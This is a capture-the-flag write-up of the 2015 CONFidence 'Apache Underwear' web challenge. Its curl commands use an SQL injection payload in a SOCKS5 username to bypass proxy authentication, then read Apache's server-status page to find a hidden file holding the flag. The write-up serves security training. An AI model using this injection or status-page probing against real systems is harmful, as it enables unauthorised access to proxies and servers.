Rating:

# Teaser CONFidence CTF 2015: Apache Underwear

----------
## Challenge details
| Contest | Challenge | Category | Points |
|:---------------|:--------------|:----------|-------:|
| Teaser CONFidence CTF 2015 | Apache Underwear | Web | 400 |

**Description:**
>*Pwn [this server](http://134.213.136.187:8080/). Keep in mind, this is a web challenge :-O.*

----------
## Write-up

When connecting to the server, we are served the following page content:

>```html
>Youe IP (x.x.x.x) is too world wide ;
>```

Obviously this is a hint at the fact that the server only accepts connections coming from the local network (or localhost) and we have to connect to a socks server on port 9090 first.

Let's give it a first try:

>```bash
>$ curl --socks5 134.213.136.187:9090 http://127.0.0.1/
>curl: (7) No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
>$ curl --socks5 ayy:[email protected]:9090 http://127.0.0.1/
>curl: (7) User was rejected by the SOCKS5 server (1 99).
>```

So we don't know the username and password to the socks5 server. Since this is a web challenge we made a wild guess that the socks5 server might use some kind of dbms backend to do user management, so we tried SQL injection:

>```bash
>$ curl --socks5 "' or 1=1/*:[email protected]:9090" "http://127.0.0.1:8080/"
>Nice One ! close ...
>```

Ok, so that worked. After some messing around and trying various different pages we decided to give apache's [mod_status page](http://httpd.apache.org/docs/2.2/mod/mod_status.html) a try (since this will disclose quests currently being processed):

>```bash
>$ curl --socks5 "' or 1=1/*:[email protected]:9090" "http://127.0.0.1:8080/server-status"
>
><html><head>
><meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
><title>Apache Status</title>
></head><body>
><h1>Apache Server Status for 127.0.0.1</h1>
>(...)
><table border="0"><tbody><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU
></th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr>
>
><tr><td>0-0</td><td>2989</td><td>0/2/2</td><td>_
></td><td>0.01</td><td>549</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
></td><td>127.0.0.1</td><td nowrap="nowrap">127.0.1.1</td><td nowrap="nowrap">GET /omg-omg-s3cr3t-file.txt HTTP/1.0</td></tr>
>
><tr><td>1-0</td><td>2990</td><td>0/1/1</td><td>W
></td><td>0.01</td><td>0</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
></td><td>127.0.0.1</td><td nowrap="nowrap">127.0.1.1</td><td nowrap="nowrap">GET /server-status HTTP/1.1</td></tr>
>(...)
><address>Apache/2.2.22 (Ubuntu) Server at 127.0.0.1 Port 80</address>
>
></body></html>
>```

The following immediately stands out:

>*GET /omg-omg-s3cr3t-file.txt*

Let's try that one:

>```bash
>$ curl --socks5 "' or 1=1/*:[email protected]:9090" "http://127.0.0.1:8080/omg-omg-s3cr3t-file.txt"
>DrgnS{S0xySqliAndAp4ch3}
>```

Original writeup (https://github.com/smokeleeteveryday/CTF_WRITEUPS/tree/master/2015/CONFIDENCE_TEASER/web/apacheunderwear).